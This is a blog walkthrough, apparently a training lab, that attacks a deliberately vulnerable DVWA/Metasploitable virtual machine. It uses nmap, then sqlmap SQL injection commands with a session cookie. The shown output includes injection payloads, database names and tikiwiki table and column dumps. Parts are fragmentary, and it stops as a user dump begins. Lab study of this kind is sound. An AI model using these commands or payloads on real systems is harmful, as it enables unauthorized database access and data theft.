Learning Infomation Security

Saturday, March 22, 2014

METASPLOIT DVWA GNU LINUX IN VIRTUALBOX

root@bt:/pentest/database/sqlmap# nmap 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-26 21:54 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown

completed scans continue to know databases, with a command like the following:

=>http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

dvwa address that is in the browser, notice before

=>security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab

the address out of proxie burp suite, note the burp suite before

Select 1 [1] Follow the redirection (default) view databases as a whole.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=cf4edd7579db6af1cf7634bd4cebe7ab" --dbs

sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:46:43

[03:46:43] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[03:46:43] [INFO] resuming injection data from session file
[03:46:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:46:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[03:46:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:46:43] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[03:46:43] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:46:43

continue with doing such a command below, to find out the data that is in tables, select 1-> [1] Follow the redirection (the

default) to view the data contained in the tables as a whole:

sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:51:21

[03:51:22] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file

[03:51:22] [INFO] resuming injection data from session file

[03:51:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[03:51:22] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit

---

[03:51:22] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)

web application technology: PHP 5.2.4, Apache 2.2.8

back-end DBMS: MySQL 5.0

[03:51:22] [INFO] fetching tables for database: tikiwiki

Database: tikiwiki

[194 tables]

+------------------------------------+

| galaxia_activities |

| galaxia_activity_roles |

| galaxia_instance_activities |

| galaxia_instance_comments |

| galaxia_instances |

| galaxia_processes |

| galaxia_roles |

| galaxia_transitions |

| galaxia_user_roles |

| galaxia_workitems |

| messu_archive |

| messu_messages |

| messu_sent |

| sessions |

| tiki_actionlog |

| tiki_article_types |

| tiki_articles |

| tiki_banners |

| tiki_banning |

| tiki_banning_sections |

| tiki_blog_activity |

| tiki_blog_posts |

| tiki_blog_posts_images |

| tiki_blogs |

| tiki_calendar_categories |

| tiki_calendar_items |

| tiki_calendar_locations |

| tiki_calendar_roles |

| tiki_calendars |

| tiki_categories |

| tiki_categorized_objects |

| tiki_category_objects |

| tiki_category_sites |

| tiki_chart_items |

| tiki_charts |

| tiki_charts_rankings |

| tiki_charts_votes |

| tiki_chat_channels |

| tiki_chat_messages |

| tiki_chat_users |

| tiki_comments |

| tiki_content |

| tiki_content_templates |

| tiki_content_templates_sections |

| tiki_cookies |

| tiki_copyrights |

| tiki_directory_categories |

| tiki_directory_search |

| tiki_directory_sites |

| tiki_download |

| tiki_drawings |

| tiki_dsn |

| tiki_dynamic_variables |

| tiki_eph |

| tiki_extwiki |

| tiki_faq_questions |

| tiki_faqs |

| tiki_featured_links |

| tiki_file_galleries |

| tiki_file_handlers |

| tiki_files |

| tiki_forum_attachments |

| tiki_forum_reads |

| tiki_forums |

| tiki_forums_queue |

| tiki_forums_reported |

| tiki_friends |

| tiki_friendship_requests |

| tiki_galleries |

| tiki_galleries_scales |

| tiki_games |

| tiki_group_inclusion |

| tiki_history |

| tiki_hotwords |

| tiki_html_pages |

| tiki_html_pages_dynamic_zones |

| tiki_images |

| tiki_images_data |

| tiki_integrator_reps |

| tiki_integrator_rules |

| tiki_language |

| tiki_languages |

| tiki_link_cache |

| tiki_links |

| tiki_live_support_events |

| tiki_live_support_message_comments |

| tiki_live_support_messages |

| tiki_live_support_modules |

| tiki_live_support_operators |

| tiki_live_support_requests |

| tiki_logs |

| tiki_mail_events |

| tiki_mailin_accounts |

| tiki_menu_languages |

| tiki_menu_options |

| tiki_menus |

| tiki_minical_events |

| tiki_minical_topics |

| tiki_modules |

| tiki_newsletter_groups |

| tiki_newsletter_subscriptions |

| tiki_newsletters |

| tiki_newsreader_marks |

| tiki_newsreader_servers |

| tiki_object_ratings |

| tiki_page_footnotes |

| tiki_pages |

| tiki_pageviews |

| tiki_poll_objects |

| tiki_poll_options |

| tiki_polls |

| tiki_preferences |

| tiki_private_messages |

| tiki_programmed_content |

| tiki_quicktags |

| tiki_quiz_question_options |

| tiki_quiz_questions |

| tiki_quiz_results |

| tiki_quiz_stats |

| tiki_quiz_stats_sum |

| tiki_quizzes |

| tiki_received_articles |

| tiki_received_pages |

| tiki_referer_stats |

| tiki_related_categories |

| tiki_rss_feeds |

| tiki_rss_modules |

| tiki_score |

| tiki_search_stats |

| tiki_searchindex |

| tiki_searchsyllable |

| tiki_searchwords |

| tiki_secdb |

| tiki_semaphores |

| tiki_sent_newsletters |

| tiki_sessions |

| tiki_sheet_layout |

| tiki_sheet_values |

| tiki_sheets |

| tiki_shoutbox |

| tiki_shoutbox_words |

| tiki_stats |

| tiki_structure_versions |

| tiki_structures |

| tiki_submissions |

| tiki_suggested_faq_questions |

| tiki_survey_question_options |

| tiki_survey_questions |

| tiki_surveys |

| tiki_tags |

| tiki_theme_control_categs |

| tiki_theme_control_objects |

| tiki_theme_control_sections |

| tiki_topics |

| tiki_tracker_fields |

| tiki_tracker_item_attachments |

| tiki_tracker_item_comments |

| tiki_tracker_item_fields |

| tiki_tracker_items |

| tiki_tracker_options |

| tiki_trackers |

| tiki_translated_objects |

| tiki_untranslated |

| tiki_user_answers |

| tiki_user_answers_uploads |

| tiki_user_assigned_modules |

| tiki_user_bookmarks_folders |

| tiki_user_bookmarks_urls |

| tiki_user_mail_accounts |

| tiki_user_menus |

| tiki_user_modules |

| tiki_user_notes |

| tiki_user_postings |

| tiki_user_preferences |

| tiki_user_quizzes |

| tiki_user_taken_quizzes |

| tiki_user_tasks |

| tiki_user_tasks_history |

| tiki_user_votings |

| tiki_user_watches |

| tiki_userfiles |

| tiki_userpoints |

| tiki_users |

| tiki_users_score |

| tiki_webmail_contacts |

| tiki_webmail_messages |

| tiki_wiki_attachments |

| tiki_zones |

| users_grouppermissions |

| users_groups |

| users_objectpermissions |

| users_permissions |

| users_usergroups |

| users_users |

+------------------------------------+

[03:51:22] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

Now we proceed with dump columns, here we want to see the columns in the tables of tikiwiki, do step as before, see the following:

| name | varchar(30) |

| refresh | int(6) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_galleries_scales

[2 columns]

+-----------+---------+

| Column | Type |

+-----------+---------+

| galleryId | int(14) |

| scale | int(11) |

+-----------+---------+

Database: tikiwiki

Table: sessions

[4 columns]

+-----------+------------------+

| Column | Type |

+-----------+------------------+

| data | text |

| expireref | varchar(64) |

| expiry | int(11) unsigned |

| sesskey | char(32) |

+-----------+------------------+

Database: tikiwiki

Table: tiki_quiz_stats_sum

[6 columns]

+------------+--------------+

| Column | Type |

+------------+--------------+

| avgavg | decimal(5,2) |

| avgpoints | decimal(5,2) |

| avgtime | decimal(5,2) |

| quizId | int(10) |

| quizName | varchar(255) |

| timesTaken | int(10) |

+------------+--------------+

Database: tikiwiki

Table: tiki_charts_votes

[4 columns]

+-----------+-------------+

| Column | Type |

+-----------+-------------+

| chartId | int(14) |

| itemId | int(14) |

| timestamp | int(14) |

| user | varchar(40) |

+-----------+-------------+

Database: tikiwiki

Table: tiki_newsletters

[12 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| allowAnySub | char(1) |

| allowUserSub | char(1) |

| created | int(14) |

| description | text |

| editions | int(10) |

| frequency | int(14) |

| lastSent | int(14) |

| name | varchar(200) |

| nlId | int(12) |

| unsubMsg | char(1) |

| users | int(10) |

| validateAddr | char(1) |

+--------------+--------------+

Database: tikiwiki

Table: tiki_webmail_contacts

[6 columns]

+-----------+--------------+

| Column | Type |

+-----------+--------------+

| contactId | int(12) |

| email | varchar(250) |

| firstName | varchar(80) |

| lastName | varchar(80) |

| nickname | varchar(200) |

| user | varchar(40) |

+-----------+--------------+

Database: tikiwiki

Table: tiki_programmed_content

[4 columns]

+-------------+---------+

| Column | Type |

+-------------+---------+

| contentId | int(8) |

| data | text |

| pId | int(8) |

| publishDate | int(14) |

+-------------+---------+

Database: tikiwiki

Table: tiki_searchsyllable

[3 columns]

+-------------+-------------+

| Column | Type |

+-------------+-------------+

| lastUpdated | int(11) |

| lastUsed | int(11) |

| syllable | varchar(80) |

+-------------+-------------+

Database: tikiwiki

Table: tiki_category_sites

[2 columns]

+---------+---------+

| Column | Type |

+---------+---------+

| categId | int(10) |

| siteId | int(14) |

+---------+---------+

Database: tikiwiki

Table: tiki_zones

[1 column]

+--------+-------------+

| Column | Type |

+--------+-------------+

| zone | varchar(40) |

+--------+-------------+

Database: tikiwiki

Table: tiki_faqs

[7 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| canSuggest | char(1) |

| created | int(14) |

| description | text |

| faqId | int(10) |

| hits | int(8) |

| questions | int(5) |

| title | varchar(200) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_chart_items

[9 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| average | decimal(4,2) |

| chartId | int(14) |

| created | int(14) |

| description | text |

| itemId | int(14) |

| points | int(14) |

| title | varchar(250) |

| URL | varchar(250) |

| votes | int(14) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_user_preferences

[3 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| prefName | varchar(40) |

| user | varchar(40) |

| value | varchar(250) |

+----------+--------------+

Database: tikiwiki

Table: tiki_surveys

[7 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| created | int(14) |

| description | text |

| lastTaken | int(14) |

| name | varchar(200) |

| status | char(1) |

| surveyId | int(12) |

| taken | int(10) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_theme_control_objects

[4 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| name | varchar(250) |

| objId | varchar(250) |

| theme | varchar(250) |

| type | varchar(250) |

+--------+--------------+

Database: tikiwiki

Table: messu_sent

[15 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| body | text |

| date | int(14) |

| hash | varchar(32) |

| isFlagged | char(1) |

| isRead | char(1) |

| isReplied | char(1) |

| msgId | int(14) |

| priority | int(2) |

| replyto_hash | varchar(32) |

| subject | varchar(255) |

| user | varchar(40) |

| user_bcc | text |

| user_cc | text |

| user_from | varchar(40) |

| user_to | text |

+--------------+--------------+

Database: tikiwiki

Table: tiki_untranslated

[3 columns]

+--------+----------+

| Column | Type |

+--------+----------+

| id | int(14) |

| lang | char(16) |

| source | tinyblob |

+--------+----------+

Database: tikiwiki

Table: tiki_search_stats

[2 columns]

+--------+-------------+

| Column | Type |

+--------+-------------+

| hits | int(10) |

| term | varchar(50) |

+--------+-------------+

Database: tikiwiki

Table: tiki_dsn

[3 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| dsn | varchar(255) |

| dsnId | int(12) |

| name | varchar(200) |

+--------+--------------+

Database: tikiwiki

Table: tiki_banning

[13 columns]

+-----------+-------------------+

| Column | Type |

+-----------+-------------------+

| banId | int(12) |

| created | int(14) |

| date_from | timestamp |

| date_to | timestamp |

| ip1 | char(3) |

| ip2 | char(3) |

| ip3 | char(3) |

| ip4 | char(3) |

| message | text |

| mode | enum('user','ip') |

| title | varchar(200) |

| use_dates | char(1) |

| user | varchar(40) |

+-----------+-------------------+

Database: tikiwiki

Table: tiki_preferences

[2 columns]

+--------+-------------+

| Column | Type |

+--------+-------------+

| name | varchar(40) |

| value | text |

+--------+-------------+

Database: tikiwiki

Table: tiki_comments

[20 columns]

+----------------+--------------+

| Column | Type |

+----------------+--------------+

| average | decimal(8,4) |

| comment_rating | tinyint(2) |

| commentDate | int(14) |

| data | text |

| hash | varchar(32) |

| hits | int(8) |

| in_reply_to | varchar(250) |

| message_id | varchar(250) |

| object | varchar(255) |

| objectType | varchar(32) |

| parentId | int(14) |

| points | decimal(8,2) |

| smiley | varchar(80) |

| summary | varchar(240) |

| threadId | int(14) |

| title | varchar(100) |

| type | char(1) |

| user_ip | varchar(15) |

| userName | varchar(40) |

| votes | int(8) |

+----------------+--------------+

Database: tikiwiki

Table: tiki_received_pages

[8 columns]

+------------------+--------------+

| Column | Type |

+------------------+--------------+

| comment | varchar(200) |

| data | longblob |

| description | varchar(200) |

| pageName | varchar(160) |

| receivedDate | int(14) |

| receivedFromSite | varchar(200) |

| receivedFromUser | varchar(200) |

| receivedPageId | int(14) |

+------------------+--------------+

Database: tikiwiki

Table: tiki_extwiki

[3 columns]

+-----------+--------------+

| Column | Type |

+-----------+--------------+

| extwiki | varchar(255) |

| extwikiId | int(12) |

| name | varchar(200) |

+-----------+--------------+

Database: tikiwiki

Table: tiki_rss_modules

[9 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| content | longblob |

| description | text |

| lastUpdated | int(14) |

| name | varchar(30) |

| refresh | int(8) |

| rssId | int(8) |

| showPubDate | char(1) |

| showTitle | char(1) |

| url | varchar(255) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_calendars

[13 columns]

+--------------------+---------------+

| Column | Type |

+--------------------+---------------+

| calendarId | int(14) |

| created | int(14) |

| customcategories | enum('n','y') |

| customlanguages | enum('n','y') |

| customlocations | enum('n','y') |

| customparticipants | enum('n','y') |

| custompriorities | enum('n','y') |

| customsubscription | enum('n','y') |

| description | varchar(255) |

| lastmodif | int(14) |

| name | varchar(80) |

| personal | enum('n','y') |

| user | varchar(40) |

+--------------------+---------------+

Database: tikiwiki

Table: tiki_live_support_events

[7 columns]

+-----------+-------------+

| Column | Type |

+-----------+-------------+

| data | text |

| eventId | int(14) |

| reqId | varchar(32) |

| senderId | varchar(32) |

| seqId | int(14) |

| timestamp | int(14) |

| type | varchar(40) |

+-----------+-------------+

Database: tikiwiki

Table: tiki_blog_posts_images

[6 columns]

+----------+-------------+

| Column | Type |

+----------+-------------+

| data | longblob |

| filename | varchar(80) |

| filesize | int(14) |

| filetype | varchar(80) |

| imgId | int(14) |

| postId | int(14) |

+----------+-------------+

Database: tikiwiki

Table: tiki_pages

[23 columns]

+-----------------+------------------+

| Column | Type |

+-----------------+------------------+

| cache | longtext |

| cache_timestamp | int(14) |

| comment | varchar(200) |

| created | int(14) |

| creator | varchar(200) |

| data | text |

| description | varchar(200) |

| flag | char(1) |

| hits | int(8) |

| ip | varchar(15) |

| is_html | tinyint(1) |

| lang | varchar(16) |

| lastModif | int(14) |

| lockedby | varchar(200) |

| page_id | int(14) |

| page_size | int(10) unsigned |

| pageName | varchar(160) |

| pageRank | decimal(4,3) |

| points | int(8) |

| user | varchar(40) |

| version | int(8) |

| votes | int(8) |

| wiki_cache | int(10) |

+-----------------+------------------+

Database: tikiwiki

Table: tiki_poll_objects

[3 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| catObjectId | int(11) |

| pollId | int(11) |

| title | varchar(255) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_forum_attachments

[11 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| attId | int(14) |

| created | int(14) |

| data | longblob |

| dir | varchar(200) |

| filename | varchar(250) |

| filesize | int(12) |

| filetype | varchar(250) |

| forumId | int(14) |

| path | varchar(250) |

| qId | int(14) |

| threadId | int(14) |

+----------+--------------+

Database: tikiwiki

Table: tiki_categories

[5 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| categId | int(12) |

| description | varchar(250) |

| hits | int(8) |

| name | varchar(100) |

| parentId | int(12) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_quizzes

[37 columns]

+------------------------+--------------+

| Column | Type |

+------------------------+--------------+

| bAdditionalQuestions | char(1) |

| bDeleted | char(1) |

| bForum | char(1) |

| bLimitQuestionsPerPage | char(1) |

| bMultiSession | char(1) |

| bOnline | char(1) |

| bRandomQuestions | char(1) |

| canRepeat | char(1) |

| created | int(14) |

| description | text |

| expireDate | int(14) |

| immediateFeedback | char(1) |

| name | varchar(255) |

| nAuthor | int(4) |

| nCanRepeat | tinyint(4) |

| nLimitQuestionsPerPage | tinyint(4) |

| nRandomQuestions | tinyint(4) |

| nVersion | int(4) |

| passingperct | int(4) |

| publishDate | int(14) |

| questionsPerPage | int(4) |

| quizId | int(10) |

| sData | text |

| sEpilogue | text |

| sForum | varchar(80) |

| sGradingMethod | varchar(80) |

| showAnswers | char(1) |

| shuffleAnswers | char(1) |

| shuffleQuestions | char(1) |

| sPrologue | text |

| sPublishStats | varchar(80) |

| sShowCorrectAnswers | varchar(80) |

| sShowScore | varchar(80) |

| storeResults | char(1) |

| taken | int(10) |

| timeLimit | int(14) |

| timeLimited | char(1) |

+------------------------+--------------+

Database: tikiwiki

Table: tiki_userpoints

[3 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| points | decimal(8,2) |

| user | varchar(40) |

| voted | int(8) |

+--------+--------------+

Database: tikiwiki

Table: tiki_user_answers

[4 columns]

+--------------+---------+

| Column | Type |

+--------------+---------+

| optionId | int(10) |

| questionId | int(10) |

| quizId | int(10) |

| userResultId | int(10) |

+--------------+---------+

Database: tikiwiki

Table: tiki_suggested_faq_questions

[6 columns]

+----------+-------------+

| Column | Type |

+----------+-------------+

| answer | text |

| created | int(14) |

| faqId | int(10) |

| question | text |

| sfqId | int(10) |

| user | varchar(40) |

+----------+-------------+

Database: tikiwiki

Table: tiki_integrator_reps

[9 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| cacheable | char(1) |

| css_file | varchar(255) |

| description | text |

| expiration | int(11) |

| name | varchar(255) |

| path | varchar(255) |

| repID | int(11) |

| start_page | varchar(255) |

| visibility | char(1) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_html_pages_dynamic_zones

[4 columns]

+----------+-------------+

| Column | Type |

+----------+-------------+

| content | text |

| pageName | varchar(40) |

| type | char(2) |

| zone | varchar(80) |

+----------+-------------+

Database: tikiwiki

Table: tiki_minical_topics

[9 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| data | longblob |

| filename | varchar(200) |

| filesize | varchar(200) |

| filetype | varchar(200) |

| isIcon | char(1) |

| name | varchar(250) |

| path | varchar(250) |

| topicId | int(12) |

| user | varchar(40) |

+----------+--------------+

Database: tikiwiki

Table: tiki_banners

[29 columns]

+----------------+--------------+

| Column | Type |

+----------------+--------------+

| alt | varchar(250) |

| bannerId | int(12) |

| clicks | int(8) |

| client | varchar(200) |

| created | int(14) |

| fixedURLData | varchar(255) |

| fri | char(1) |

| fromDate | int(14) |

| hourFrom | varchar(4) |

| hourTo | varchar(4) |

| HTMLData | text |

| imageData | longblob |

| imageName | varchar(100) |

| imageType | varchar(200) |

| impressions | int(8) |

| maxImpressions | int(8) |

| mon | char(1) |

| sat | char(1) |

| sun | char(1) |

| textData | text |

| thu | char(1) |

| title | varchar(255) |

| toDate | int(14) |

| tue | char(1) |

| url | varchar(255) |

| useDates | char(1) |

| wed | char(1) |

| which | varchar(50) |

| zone | varchar(40) |

+----------------+--------------+

Database: tikiwiki

Table: tiki_related_categories

[2 columns]

+-----------+---------+

| Column | Type |

+-----------+---------+

| categId | int(10) |

| relatedTo | int(10) |

+-----------+---------+

Database: tikiwiki

Table: tiki_user_taken_quizzes

[2 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| quizId | varchar(255) |

| user | varchar(40) |

+--------+--------------+

Database: tikiwiki

Table: tiki_users_score

[4 columns]

+----------+-----------+

| Column | Type |

+----------+-----------+

| event_id | char(40) |

| expire | int(14) |

| tstamp | timestamp |

| user | char(40) |

+----------+-----------+

Database: tikiwiki

Table: tiki_calendar_locations

[4 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| calendarId | int(14) |

| callocId | int(14) |

| description | blob |

| name | varchar(255) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_cookies

[2 columns]

+----------+---------+

| Column | Type |

+----------+---------+

| cookie | text |

| cookieId | int(10) |

+----------+---------+

Database: tikiwiki

Table: tiki_forums_queue

[13 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| data | text |

| forumId | int(14) |

| hash | varchar(32) |

| object | varchar(32) |

| parentId | int(14) |

| qId | int(14) |

| summary | varchar(240) |

| timestamp | int(14) |

| title | varchar(240) |

| topic_smiley | varchar(80) |

| topic_title | varchar(240) |

| type | varchar(60) |

| user | varchar(40) |

+--------------+--------------+

Database: tikiwiki

Table: users_grouppermissions

[3 columns]

+-----------+--------------+

| Column | Type |

+-----------+--------------+

| groupName | varchar(255) |

| permName | varchar(30) |

| value | char(1) |

+-----------+--------------+

Database: tikiwiki

Table: tiki_drawings

[7 columns]

+---------------+--------------+

| Column | Type |

+---------------+--------------+

| drawId | int(12) |

| filename_draw | varchar(250) |

| filename_pad | varchar(250) |

| name | varchar(250) |

| timestamp | int(14) |

| user | varchar(40) |

| version | int(8) |

+---------------+--------------+

Database: tikiwiki

Table: tiki_tracker_fields

[12 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| fieldId | int(12) |

| isHidden | char(1) |

| isMain | char(1) |

| isMandatory | char(1) |

| isPublic | char(1) |

| isSearchable | char(1) |

| isTblVisible | char(1) |

| name | varchar(255) |

| options | text |

| position | int(4) |

| trackerId | int(12) |

| type | char(1) |

+--------------+--------------+

Database: tikiwiki

Table: tiki_chat_users

[3 columns]

+-----------+--------------+

| Column | Type |

+-----------+--------------+

| channelId | int(8) |

| nickname | varchar(200) |

| timestamp | int(14) |

+-----------+--------------+

Database: tikiwiki

Table: tiki_content_templates

[4 columns]

+------------+--------------+

| Column | Type |

+------------+--------------+

| content | longblob |

| created | int(14) |

| name | varchar(200) |

| templateId | int(10) |

+------------+--------------+

Database: tikiwiki

Table: tiki_poll_options

[5 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| optionId | int(8) |

| pollId | int(8) |

| position | int(4) |

| title | varchar(200) |

| votes | int(8) |

+----------+--------------+

Database: tikiwiki

Table: tiki_blog_activity

[3 columns]

+--------+---------+

| Column | Type |

+--------+---------+

| blogId | int(8) |

| day | int(14) |

| posts | int(8) |

+--------+---------+

Database: tikiwiki

Table: tiki_mailin_accounts

[17 columns]

+-----------------+--------------+

| Column | Type |

+-----------------+--------------+

| account | varchar(50) |

| accountId | int(12) |

| active | char(1) |

| anonymous | char(1) |

| article_topicId | int(4) |

| article_type | varchar(50) |

| attachments | char(1) |

| discard_after | varchar(255) |

| pass | varchar(100) |

| pop | varchar(255) |

| port | int(4) |

| smtp | varchar(255) |

| smtpPort | int(4) |

| type | varchar(40) |

| useAuth | char(1) |

| user | varchar(40) |

| username | varchar(100) |

+-----------------+--------------+

Database: tikiwiki

Table: tiki_logs

[7 columns]

+------------+--------------+

| Column | Type |

+------------+--------------+

| logclient | text |

| logId | int(8) |

| logip | varchar(200) |

| logmessage | text |

| logtime | int(14) |

| logtype | varchar(20) |

| loguser | varchar(40) |

+------------+--------------+

Database: tikiwiki

Table: tiki_live_support_modules

[2 columns]

+--------+-------------+

| Column | Type |

+--------+-------------+

| modId | int(4) |

| name | varchar(90) |

+--------+-------------+

Database: tikiwiki

Table: tiki_directory_search

[2 columns]

+--------+--------------+

| Column | Type |

+--------+--------------+

| hits | int(14) |

| term | varchar(250) |

+--------+--------------+

Database: tikiwiki

Table: tiki_tags

[11 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| comment | varchar(200) |

| data | longblob |

| description | varchar(200) |

| flag | char(1) |

| hits | int(8) |

| ip | varchar(15) |

| lastModif | int(14) |

| pageName | varchar(160) |

| tagName | varchar(80) |

| user | varchar(40) |

| version | int(8) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_live_support_messages

[12 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| assigned_to | varchar(200) |

| data | text |

| email | varchar(250) |

| module | int(4) |

| msgId | int(12) |

| priority | int(2) |

| resolution | varchar(100) |

| status | char(1) |

| timestamp | int(14) |

| title | varchar(200) |

| user | varchar(40) |

| username | varchar(200) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_tracker_item_fields

[3 columns]

+---------+---------+

| Column | Type |

+---------+---------+

| fieldId | int(12) |

| itemId | int(12) |

| value | text |

+---------+---------+

Database: tikiwiki

Table: tiki_searchwords

[2 columns]

+------------+-------------+

| Column | Type |

+------------+-------------+

| searchword | varchar(80) |

| syllable | varchar(80) |

+------------+-------------+

Database: tikiwiki

Table: tiki_webmail_messages

[6 columns]

+-----------+--------------+

| Column | Type |

+-----------+--------------+

| accountId | int(12) |

| isFlagged | char(1) |

| isRead | char(1) |

| isReplied | char(1) |

| mailId | varchar(255) |

| user | varchar(40) |

+-----------+--------------+

Database: tikiwiki

Table: tiki_languages

[2 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| lang | char(16) |

| language | varchar(255) |

+----------+--------------+

Database: tikiwiki

Table: tiki_user_assigned_modules

[5 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| name | varchar(200) |

| ord | int(4) |

| position | char(1) |

| type | char(1) |

| user | varchar(40) |

+----------+--------------+

Database: tikiwiki

Table: tiki_live_support_message_comments

[4 columns]

+-----------+---------+

| Column | Type |

+-----------+---------+

| cId | int(12) |

| data | text |

| msgId | int(12) |

| timestamp | int(14) |

+-----------+---------+

Database: tikiwiki

Table: galaxia_roles

[5 columns]

+-------------+-------------+

| Column | Type |

+-------------+-------------+

| description | text |

| lastModif | int(14) |

| name | varchar(80) |

| pId | int(14) |

| roleId | int(14) |

+-------------+-------------+

Database: tikiwiki

Table: tiki_content

[2 columns]

+-------------+--------+

| Column | Type |

+-------------+--------+

| contentId | int(8) |

| description | text |

+-------------+--------+

Database: tikiwiki

Table: tiki_menus

[4 columns]

+-------------+--------------+

| Column | Type |

+-------------+--------------+

| description | text |

| menuId | int(8) |

| name | varchar(200) |

| type | char(1) |

+-------------+--------------+

Database: tikiwiki

Table: tiki_live_support_operators

[11 columns]

+-------------------+-------------+

| Column | Type |

+-------------------+-------------+

| accepted_requests | int(10) |

| average_chat | int(10) |

| last_chat | int(14) |

| longest_chat | int(10) |

| points | int(10) |

| shortest_chat | int(10) |

| status | varchar(20) |

| status_since | int(14) |

| time_online | int(10) |

| user | varchar(40) |

| votes | int(10) |

+-------------------+-------------+

[03:49:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:49:04

Now we continue with the user dump, here we would like to see a user that exists in the tables, do the tiki_pages as before, see the following:

